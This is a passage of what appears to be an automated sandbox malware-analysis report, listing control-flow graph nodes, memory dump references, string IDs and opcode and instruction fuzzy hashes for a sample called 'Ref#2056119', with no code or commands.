6b3383e-6b3384a 235->242 238 6b33807 236->238 239 6b33809-6b3380b 236->239 237->231 238->235 239->235 243 6b33832-6b33834 241->243 244 6b33830 241->244 246 6b33862-6b338b3 242->246 247 6b3384c-6b33852 242->247 243->242 244->242 246->216 248 6b33856-6b33858 247->248 249 6b33854 247->249 248->246 249->246 257->150 258->150
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                  • API String ID: 0-1342094364
                                                                                  • Opcode ID: 55056ef0d1ddcf6324753aace8f2a7a315e6f470fab25472dd846f3e695972cd
                                                                                  • Instruction ID: 1532a2df767709d0113658fc40a3231748a8b0cb1013617da9448e11a073d181
                                                                                  • Opcode Fuzzy Hash: 55056ef0d1ddcf6324753aace8f2a7a315e6f470fab25472dd846f3e695972cd
                                                                                  • Instruction Fuzzy Hash: F4322031E1066ACFCB14EF75D95459EF7B2FFC9300F208699D409AB264EB30A985CB90

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 801 6b37df0-6b37e0e 802 6b37e10-6b37e13 801->802 803 6b37e15-6b37e2f 802->803 804 6b37e34-6b37e37 802->804 803->804 805 6b37e44-6b37e47 804->805 806 6b37e39-6b37e43 804->806 808 6b37e49-6b37e57 805->808 809 6b37e5e-6b37e61 805->809 816 6b37e96-6b37eac 808->816 817 6b37e59 808->817 810 6b37e63-6b37e7f 809->810 811 6b37e84-6b37e86 809->811 810->811 813 6b37e88 811->813 814 6b37e8d-6b37e90 811->814 813->814 814->802 814->816 821 6b37eb2-6b37ebb 816->821 822 6b380c7-6b380d1 816->822 817->809 823 6b380d2-6b380dc 821->823 824 6b37ec1-6b37ede 821->824 827 6b380de-6b38107 823->827 828 6b3812d-6b3813e 823->828 832 6b380b4-6b380c1 824->832 833 6b37ee4-6b37f0c 824->833 830 6b38109-6b3810c 827->830 836 6b38123-6b38127 828->836 837 6b38140-6b38184 828->837 834 6b38112-6b38121 830->834 835 6b38341-6b38344 830->835 832->821 832->822 833->832 855 6b37f12-6b37f1b 833->855 834->836 834->837 838 6b38367-6b3836a 835->838 839 6b38346-6b38362 835->839 836->828 848 6b38315-6b3832b 837->848 849 6b3818a-6b3819b 837->849 841 6b38370-6b3837c 838->841 842 6b38415-6b38417 838->842 839->838 852 6b38387-6b38389 841->852 846 6b38419 842->846 847 6b3841e-6b38421 842->847 846->847 847->830 850 6b38427-6b38430 847->850 848->835 865 6b381a1-6b381be 849->865 866 6b38300-6b3830f 849->866 856 6b383a1-6b383a5 852->856 857 6b3838b-6b38391 852->857 855->823 861 6b37f21-6b37f3d 855->861 858 6b383b3 856->858 859 6b383a7-6b383b1 856->859 862 6b38393 857->862 863 6b38395-6b38397 857->863 864 6b383b8-6b383ba 858->864 859->864 873 6b37f43-6b37f6d 861->873 874 6b380a2-6b380ae 861->874 862->856 863->856 868 6b383cb-6b38404 864->868 869 6b383bc-6b383bf 864->869 865->866 878 6b381c4-6b382ba call 6b36618 865->878 866->848 866->849 868->834 888 6b3840a-6b38414 868->888 869->850 886 6b37f73-6b37f9b 873->886 887 6b38098-6b3809d 873->887 874->832 874->855 935 6b382c8 878->935 936 6b382bc-6b382c6 878->936 886->887 894 6b37fa1-6b37fcf 886->894 887->874 894->887 900 6b37fd5-6b37fde 894->900 900->887 901 6b37fe4-6b38016 900->901 909 6b38021-6b3803d 901->909 910 6b38018-6b3801c 901->910 909->874 912 6b3803f-6b38096 call 6b36618 909->912 910->887 911 6b3801e 910->911 911->909 912->874 937 6b382cd-6b382cf 935->937 936->937 937->866 938 6b382d1-6b382d6 937->938 939 6b382e4 938->939 940 6b382d8-6b382e2 938->940 941 6b382e9-6b382eb 939->941 940->941 941->866 942 6b382ed-6b382f9 941->942 942->866
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $kq$$kq
                                                                                  • API String ID: 0-3550614674
                                                                                  • Opcode ID: a8de880c70b953e203fd9f76df54af42a746c9466e3278d78cd88f5df64527ce
                                                                                  • Instruction ID: 3bf258a62a2d2551232b3bd744f2404a7efb6af46c9a81fcda0ac776a47dbb57
                                                                                  • Opcode Fuzzy Hash: a8de880c70b953e203fd9f76df54af42a746c9466e3278d78cd88f5df64527ce
                                                                                  • Instruction Fuzzy Hash: 3702A070B102268FDB54DB65D9906AEB7F6FF84300F148569E4069B398DB35EC86CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a704706bcf580d3faa13fde1596a12971cdb65de35adc2b7cceb477b193f4f0f
                                                                                  • Instruction ID: 428300f7ae2779f2c73e906e3e7e2c433e6af1c546b27c2ada5adaa948940cb7
                                                                                  • Opcode Fuzzy Hash: a704706bcf580d3faa13fde1596a12971cdb65de35adc2b7cceb477b193f4f0f
                                                                                  • Instruction Fuzzy Hash: A6923570B002248FDBA4DF68C584B6DB7F2EF45314F5485A9E40AAB365DB35EE85CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 06dcd94b49c08457e8a82c0acea975802786404357d7b1f5465b49dad9df1c74
                                                                                  • Instruction ID: 02b6a8eb686498c5cbd9ebe776271e29110957d35e14eafcd1312d1f0a4042cc
                                                                                  • Opcode Fuzzy Hash: 06dcd94b49c08457e8a82c0acea975802786404357d7b1f5465b49dad9df1c74
                                                                                  • Instruction Fuzzy Hash: C262AE70B002299FDF54DB68D584AADB7F2EF88310F1485A9E806DB395EB35ED45CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e05c4ebc78537cd5a1fbcc74a04e2beb5777cbe6420b80d406ce20457c2d2723
                                                                                  • Instruction ID: 0aba45e147ab7c8609d07f681df6d9fb54b48431886041cac742d9b264d0c3d2
                                                                                  • Opcode Fuzzy Hash: e05c4ebc78537cd5a1fbcc74a04e2beb5777cbe6420b80d406ce20457c2d2723
                                                                                  • Instruction Fuzzy Hash: A7328170B102298FDF54DFA8D980AAEBBB2FB88310F109565D506E7399DB35EC41CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b641f8d9eef54c7ddfb5473e4f58883d7494d5719b746de66d5ff751e1871d87
                                                                                  • Instruction ID: 07b0094fa584b06db145720c6b21d7be0b783ae3275a0439e4076b85c97bad55
                                                                                  • Opcode Fuzzy Hash: b641f8d9eef54c7ddfb5473e4f58883d7494d5719b746de66d5ff751e1871d87
                                                                                  • Instruction Fuzzy Hash: EB12F1B2F002259FDF70DB64D88066EB7B6FF84320F2485A9D8569B395CA34EC41CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 55f1823c27bba57af46f35590c7b951553c6baca9e3bcf9a49bf18f9e6050eca
                                                                                  • Instruction ID: 3336cb31add7f1d52233b947d46584de4aa42269d0ce5de8b4f7a93db8f1e2d2
                                                                                  • Opcode Fuzzy Hash: 55f1823c27bba57af46f35590c7b951553c6baca9e3bcf9a49bf18f9e6050eca
                                                                                  • Instruction Fuzzy Hash: EE2281B0F102299FDF60CB68C5907ADB7B2FB95310F20956AE409EB399DA35DC81CB51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                                                  • API String ID: 0-1342094364
                                                                                  • Opcode ID: c0bfab67c72212611f1f74390da6f6a9ee884088fe8251de393b6e33a312e461
                                                                                  • Instruction ID: 60de0d0bd7ba61f435b5c16383d97086356b9569b0162bc190f517977a2ce62e
                                                                                  • Opcode Fuzzy Hash: c0bfab67c72212611f1f74390da6f6a9ee884088fe8251de393b6e33a312e461
                                                                                  • Instruction Fuzzy Hash: A2029EB0F1022A9FDB64CF68D5806ADB7B2FB95310F2095AAD405DB359DB34ED85CB80

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 429 6b391c0-6b391e5 430 6b391e7-6b391ea 429->430 431 6b39210-6b39213 430->431 432 6b391ec-6b3920b 430->432 433 6b39ad3-6b39ad5 431->433 434 6b39219-6b3922e 431->434 432->431 435 6b39ad7 433->435 436 6b39adc-6b39adf 433->436 440 6b39230-6b39236 434->440 441 6b39246-6b3925c 434->441 435->436 436->430 438 6b39ae5-6b39aef 436->438 443 6b3923a-6b3923c 440->443 444 6b39238 440->444 446 6b39267-6b39269 441->446 443->441 444->441 447 6b39281-6b392f2 446->447 448 6b3926b-6b39271 446->448 459 6b392f4-6b39317 447->459 460 6b3931e-6b3933a 447->460 449 6b39273 448->449 450 6b39275-6b39277 448->450 449->447 450->447 459->460 465 6b39366-6b39381 460->465 466 6b3933c-6b3935f 460->466 471 6b39383-6b393a5 465->471 472 6b393ac-6b393c7 465->472 466->465 471->472 477 6b393f2-6b393fc 472->477 478 6b393c9-6b393eb 472->478 479 6b393fe-6b39407 477->479 480 6b3940c-6b39486 477->480 478->477 479->438 486 6b394d3-6b394e8 480->486 487 6b39488-6b394a6 480->487 486->433 491 6b394c2-6b394d1 487->491 492 6b394a8-6b394b7 487->492 491->486 491->487 492->491
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $kq$$kq$$kq$$kq
                                                                                  • API String ID: 0-2881790790
                                                                                  • Opcode ID: 404fdf8e634fa00e052ce0652c89e19ce9acf3c53974ad9ee29bceb4f629e1ee
                                                                                  • Instruction ID: 5e077523e17fd3a621262c482228f689d75657d0f52adc492ed85d39516cf128
                                                                                  • Opcode Fuzzy Hash: 404fdf8e634fa00e052ce0652c89e19ce9acf3c53974ad9ee29bceb4f629e1ee
                                                                                  • Instruction Fuzzy Hash: 19915270F0021A8FDB64EF65D9507AEB3F6EFC4240F1085A9C40AAB398EB70DD458B90

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 495 6b3cfb8-6b3cfd3 496 6b3cfd5-6b3cfd8 495->496 497 6b3d4a4-6b3d4b0 496->497 498 6b3cfde-6b3cfe1 496->498 499 6b3d4b6-6b3d7a3 497->499 500 6b3d26e-6b3d27d 497->500 501 6b3cfe3-6b3cfe5 498->501 502 6b3cff0-6b3cff3 498->502 707 6b3d9ca-6b3d9d4 499->707 708 6b3d7a9-6b3d7af 499->708 507 6b3d27f-6b3d284 500->507 508 6b3d28c-6b3d298 500->508 503 6b3d4a1 501->503 504 6b3cfeb 501->504 505 6b3d002-6b3d005 502->505 506 6b3cff5-6b3cff7 502->506 503->497 504->502 512 6b3d007-6b3d049 505->512 513 6b3d04e-6b3d051 505->513 510 6b3d35f-6b3d368 506->510 511 6b3cffd 506->511 507->508 514 6b3d9d5-6b3da0e 508->514 515 6b3d29e-6b3d2b0 508->515 518 6b3d377-6b3d383 510->518 519 6b3d36a-6b3d36f 510->519 511->505 512->513 516 6b3d053-6b3d095 513->516 517 6b3d09a-6b3d09d 513->517 530 6b3da10-6b3da13 514->530 531 6b3d2b5-6b3d2b8 515->531 516->517 524 6b3d0e6-6b3d0e9 517->524 525 6b3d09f-6b3d0e1 517->525 520 6b3d494-6b3d499 518->520 521 6b3d389-6b3d39d 518->521 519->518 520->503 521->503 549 6b3d3a3-6b3d3b5 521->549 528 6b3d132-6b3d135 524->528 529 6b3d0eb-6b3d12d 524->529 525->524 541 6b3d152-6b3d155 528->541 542 6b3d137-6b3d14d 528->542 529->528 535 6b3da46-6b3da49 530->535 536 6b3da15-6b3da41 530->536 537 6b3d301-6b3d304 531->537 538 6b3d2ba-6b3d2fc 531->538 546 6b3da4b call 6b3db2d 535->546 547 6b3da58-6b3da5b 535->547 536->535 551 6b3d306-6b3d348 537->551 552 6b3d34d-6b3d34f 537->552 538->537 544 6b3d157-6b3d15c 541->544 545 6b3d15f-6b3d162 541->545 542->541 544->545 553 6b3d164-6b3d173 545->553 554 6b3d1ab-6b3d1ae 545->554 567 6b3da51-6b3da53 546->567 555 6b3da7e-6b3da80 547->555 556 6b3da5d-6b3da79 547->556 582 6b3d3b7-6b3d3bd 549->582 583 6b3d3d9-6b3d3db 549->583 551->552 559 6b3d351 552->559 560 6b3d356-6b3d359 552->560 565 6b3d182-6b3d18e 553->565 566 6b3d175-6b3d17a 553->566 568 6b3d1b0-6b3d1f2 554->568 569 6b3d1f7-6b3d1fa 554->569 570 6b3da82 555->570 571 6b3da87-6b3da8a 555->571 556->555 559->560 560->496 560->510 565->514 576 6b3d194-6b3d1a6 565->576 566->565 567->547 568->569 585 6b3d243-6b3d246 569->585 586 6b3d1fc-6b3d23e 569->586 570->571 571->530 580 6b3da8c-6b3da9b 571->580 576->554 609 6b3db02-6b3db17 580->609 610 6b3da9d-6b3db00 call 6b36618 580->610 593 6b3d3c1-6b3d3cd 582->593 594 6b3d3bf 582->594 595 6b3d3e5-6b3d3f1 583->595 589 6b3d269-6b3d26c 585->589 590 6b3d248-6b3d264 585->590 586->585 589->500 589->531 590->589 602 6b3d3cf-6b3d3d7 593->602 594->602 620 6b3d3f3-6b3d3fd 595->620 621 6b3d3ff 595->621 602->595 610->609 627 6b3d404-6b3d406 620->627 621->627 627->503 632 6b3d40c-6b3d428 call 6b36618 627->632 646 6b3d437-6b3d443 632->646 647 6b3d42a-6b3d42f 632->647 646->520 649 6b3d445-6b3d492 646->649 647->646 649->503 709 6b3d7b1-6b3d7b6 708->709 710 6b3d7be-6b3d7c7 708->710 709->710 710->514 711 6b3d7cd-6b3d7e0 710->711 713 6b3d7e6-6b3d7ec 711->713 714 6b3d9ba-6b3d9c4 711->714 715 6b3d7fb-6b3d804 713->715 716 6b3d7ee-6b3d7f3 713->716 714->707 714->708 715->514 717 6b3d80a-6b3d82b 715->717 716->715 720 6b3d83a-6b3d843 717->720 721 6b3d82d-6b3d832 717->721 720->514 722 6b3d849-6b3d866 720->722 721->720 722->714 725 6b3d86c-6b3d872 722->725 725->514 726 6b3d878-6b3d891 725->726 728 6b3d897-6b3d8be 726->728 729 6b3d9ad-6b3d9b4 726->729 728->514 732 6b3d8c4-6b3d8ce 728->732 729->714 729->725 732->514 733 6b3d8d4-6b3d8eb 732->733 735 6b3d8fa-6b3d915 733->735 736 6b3d8ed-6b3d8f8 733->736 735->729 741 6b3d91b-6b3d934 call 6b36618 735->741 736->735 745 6b3d943-6b3d94c 741->745 746 6b3d936-6b3d93b 741->746 745->514 747 6b3d952-6b3d9a6 745->747 746->745 747->729
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $kq$$kq$$kq
                                                                                  • API String ID: 0-2086306503
                                                                                  • Opcode ID: ce23cf3911eb4f4dc8eaefabca97e87a40a81f33d38442ea1e7da932f148b04a
                                                                                  • Instruction ID: 77eb6521ada69979c55c0ba2aedcc87bae78a09f606da2844d64e037a03f87cc
                                                                                  • Opcode Fuzzy Hash: ce23cf3911eb4f4dc8eaefabca97e87a40a81f33d38442ea1e7da932f148b04a
                                                                                  • Instruction Fuzzy Hash: CA622370B1021A8FCB55EF68D590A5EB7B2FF85310B208A78D4059F369DB75ED86CB80

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 755 6b34c10-6b34c34 756 6b34c36-6b34c39 755->756 757 6b34c3b-6b34c55 756->757 758 6b34c5a-6b34c5d 756->758 757->758 759 6b34c63-6b34d5b 758->759 760 6b3533c-6b3533e 758->760 778 6b34d61-6b34dae call 6b354b8 759->778 779 6b34dde-6b34de5 759->779 762 6b35340 760->762 763 6b35345-6b35348 760->763 762->763 763->756 764 6b3534e-6b3535b 763->764 792 6b34db4-6b34dd0 778->792 780 6b34deb-6b34e5b 779->780 781 6b34e69-6b34e72 779->781 798 6b34e66 780->798 799 6b34e5d 780->799 781->764 796 6b34dd2 792->796 797 6b34ddb 792->797 796->797 797->779 798->781 799->798
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: fpq$XPpq$\Opq
                                                                                  • API String ID: 0-2571271785
                                                                                  • Opcode ID: 5a7bf28552cfa914c785606eab69778b0d6b8cf9124b0a58764e9248c4f2141a
                                                                                  • Instruction ID: f0342bf252bdb9a0b0f7c6a332299eef5104a51b3aedc3c3cae9a4b76dd7bd76
                                                                                  • Opcode Fuzzy Hash: 5a7bf28552cfa914c785606eab69778b0d6b8cf9124b0a58764e9248c4f2141a
                                                                                  • Instruction Fuzzy Hash: 7A618AB0F102199FEF54DFA5C854BAEBAF6FF88700F208169D106AB394DB759C458B90

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1797 6b391b3-6b391e5 1798 6b391e7-6b391ea 1797->1798 1799 6b39210-6b39213 1798->1799 1800 6b391ec-6b3920b 1798->1800 1801 6b39ad3-6b39ad5 1799->1801 1802 6b39219-6b3922e 1799->1802 1800->1799 1803 6b39ad7 1801->1803 1804 6b39adc-6b39adf 1801->1804 1808 6b39230-6b39236 1802->1808 1809 6b39246-6b3925c 1802->1809 1803->1804 1804->1798 1806 6b39ae5-6b39aef 1804->1806 1811 6b3923a-6b3923c 1808->1811 1812 6b39238 1808->1812 1814 6b39267-6b39269 1809->1814 1811->1809 1812->1809 1815 6b39281-6b392f2 1814->1815 1816 6b3926b-6b39271 1814->1816 1827 6b392f4-6b39317 1815->1827 1828 6b3931e-6b3933a 1815->1828 1817 6b39273 1816->1817 1818 6b39275-6b39277 1816->1818 1817->1815 1818->1815 1827->1828 1833 6b39366-6b39381 1828->1833 1834 6b3933c-6b3935f 1828->1834 1839 6b39383-6b393a5 1833->1839 1840 6b393ac-6b393c7 1833->1840 1834->1833 1839->1840 1845 6b393f2-6b393fc 1840->1845 1846 6b393c9-6b393eb 1840->1846 1847 6b393fe-6b39407 1845->1847 1848 6b3940c-6b39486 1845->1848 1846->1845 1847->1806 1854 6b394d3-6b394e8 1848->1854 1855 6b39488-6b394a6 1848->1855 1854->1801 1859 6b394c2-6b394d1 1855->1859 1860 6b394a8-6b394b7 1855->1860 1859->1854 1859->1855 1860->1859
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $kq$$kq
                                                                                  • API String ID: 0-3550614674
                                                                                  • Opcode ID: a216feb0b57b05ccde4d0985791373959da4b195f822c9317b7f3c10050b43f1
                                                                                  • Instruction ID: 280d3231358d680decd9c04a797442d497812aa781135527043fcd6b5d32e163
                                                                                  • Opcode Fuzzy Hash: a216feb0b57b05ccde4d0985791373959da4b195f822c9317b7f3c10050b43f1
                                                                                  • Instruction Fuzzy Hash: 93513F70B1011A8FDF54EF79D990B6EB3F6EBC8640F108569D40ADB398EA71DC518B90

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1863 6b34c00-6b34c34 1865 6b34c36-6b34c39 1863->1865 1866 6b34c3b-6b34c55 1865->1866 1867 6b34c5a-6b34c5d 1865->1867 1866->1867 1868 6b34c63-6b34d5b 1867->1868 1869 6b3533c-6b3533e 1867->1869 1887 6b34d61-6b34dae call 6b354b8 1868->1887 1888 6b34dde-6b34de5 1868->1888 1871 6b35340 1869->1871 1872 6b35345-6b35348 1869->1872 1871->1872 1872->1865 1873 6b3534e-6b3535b 1872->1873 1901 6b34db4-6b34dd0 1887->1901 1889 6b34deb-6b34e5b 1888->1889 1890 6b34e69-6b34e72 1888->1890 1907 6b34e66 1889->1907 1908 6b34e5d 1889->1908 1890->1873 1905 6b34dd2 1901->1905 1906 6b34ddb 1901->1906 1905->1906 1906->1888 1907->1890 1908->1907
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: fpq$XPpq
                                                                                  • API String ID: 0-1280283
                                                                                  • Opcode ID: c34fc665580b0b97cfb2d45586d9dbe4a08204d9317c3519ecbb101b26e69931
                                                                                  • Instruction ID: 50d3c526871eb6b76f8ccb0c6ee7e3668c7493df651de7a17120c5327fd4dfa4
                                                                                  • Opcode Fuzzy Hash: c34fc665580b0b97cfb2d45586d9dbe4a08204d9317c3519ecbb101b26e69931
                                                                                  • Instruction Fuzzy Hash: 92519D70F102199FDB54DFB5C854BAEBBF6FF88700F208529E506AB398DA718C458B90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PHkq
                                                                                  • API String ID: 0-902561536
                                                                                  • Opcode ID: 6f035940fb1a44c12dd43569c00da2581660faaa9057c47af060e88573744b83
                                                                                  • Instruction ID: bd040e78646ac3b8f794fcf0d95876b323187138e4e9f65a5640cf3f2aa655fd
                                                                                  • Opcode Fuzzy Hash: 6f035940fb1a44c12dd43569c00da2581660faaa9057c47af060e88573744b83
                                                                                  • Instruction Fuzzy Hash: 2741AEB0F1031A9FDB65DF65D58469EBBB2FF85300F20456AE406EB254EBB4D846CB80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PHkq
                                                                                  • API String ID: 0-902561536
                                                                                  • Opcode ID: 17b81b387109bead1cda5e724a90c91478362856aa2aa9eebd323e2c5883fc86
                                                                                  • Instruction ID: 6b83d265158572a7f552569228f8f385ec7def2d8139ca438f7414b3168ab3c9
                                                                                  • Opcode Fuzzy Hash: 17b81b387109bead1cda5e724a90c91478362856aa2aa9eebd323e2c5883fc86
                                                                                  • Instruction Fuzzy Hash: AE31E171B002259FDF659B34DA9466E7BA2EF89300F2454A8D406DB398DF35CE46CB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PHkq
                                                                                  • API String ID: 0-902561536
                                                                                  • Opcode ID: 317b7187f3c7240f841251242dc39ed4927803ce0153118ebe09a8066f74760e
                                                                                  • Instruction ID: 859f4ed8ffbe725e5ad6541470009f8a51a1665ac018793f64277ff01cfbfb88
                                                                                  • Opcode Fuzzy Hash: 317b7187f3c7240f841251242dc39ed4927803ce0153118ebe09a8066f74760e
                                                                                  • Instruction Fuzzy Hash: A331EF70B002158FDB64AB34DA9466E7AA6FF88200B205468D406DB398DF35DE46CB94
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $kq
                                                                                  • API String ID: 0-3037731980
                                                                                  • Opcode ID: e68b66f655d98ba09990042a58abdf6556fea742db1d821979d21f75375bb2c1
                                                                                  • Instruction ID: 56614fc1bcc86cfeaffc39ce060006d23c37bcdfe32c0e091aa28539628a2e5e
                                                                                  • Opcode Fuzzy Hash: e68b66f655d98ba09990042a58abdf6556fea742db1d821979d21f75375bb2c1
                                                                                  • Instruction Fuzzy Hash: 48F0A9B1B102268FDF749E55EA802ACB3A5EB80311F1055BAF906CB395DA35DA06C782
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 96e4590a58cb63f6e6f33269cd7c1a69676e11510f2aebb1f23a480cfcd5b0f4
                                                                                  • Instruction ID: 95a244236d4de3f1149e26941980e3074b50e32a31c045cbf7f952380ef8c8a9
                                                                                  • Opcode Fuzzy Hash: 96e4590a58cb63f6e6f33269cd7c1a69676e11510f2aebb1f23a480cfcd5b0f4
                                                                                  • Instruction Fuzzy Hash: C7817C70B0021A8FDF54DFA9D5546AEB7F6EF85300F108579D40ADB3A9EA30DC468B91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.3138652715.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_6b30000_Ref#2056119.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cf59267806b9be28df997ed7117962dcef035f66b2f349aecb9abce351e9aa85
                                                                                  • Instruction ID: 6ce0406c34c74d909a414de1629fb091b47a68207adcb81584d243f1df285d11
                                                                                  • Opcode Fuzzy Hash: cf59267806b9be28df997ed7117962dcef035f66b2f349aecb9abce351e9aa85
                                                                                  • Instruction Fuzzy Hash: 2C61D3B2F002214FCF549A7DC98066EBBDBEFD4620B154479E80ADB379EE65DC028785
                                                                                  Memory Dump Source
